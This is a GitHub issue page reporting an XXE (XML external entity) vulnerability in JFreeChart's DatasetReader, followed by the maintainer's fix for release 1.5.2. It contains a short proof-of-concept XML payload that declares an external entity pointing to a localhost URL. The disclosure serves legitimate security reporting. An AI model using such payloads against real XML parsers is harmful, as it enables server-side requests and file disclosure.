We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
You have not set security Feature to cause XXE(XML external entity attack) code
DatasetReader.readPieDatasetFromXML(new File("1.xml")); DatasetReader.readCategoryDatasetFromXML(new File("1.xml"));
1.xml
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE sec [ <!ENTITY xxe SYSTEM "http://localhost:8000" >]> <CategoryDataset>&xxe;</CategoryDataset>
The text was updated successfully, but these errors were encountered:
patch3 jfree#130 fixed
8621aa3
Thanks for the report. I've committed a fix for the upcoming version 1.5.2 release.
Sorry, something went wrong.
See #130
756c2ac
No branches or pull requests
You have not set security Feature to cause XXE(XML external entity attack)
code
1.xml
The text was updated successfully, but these errors were encountered: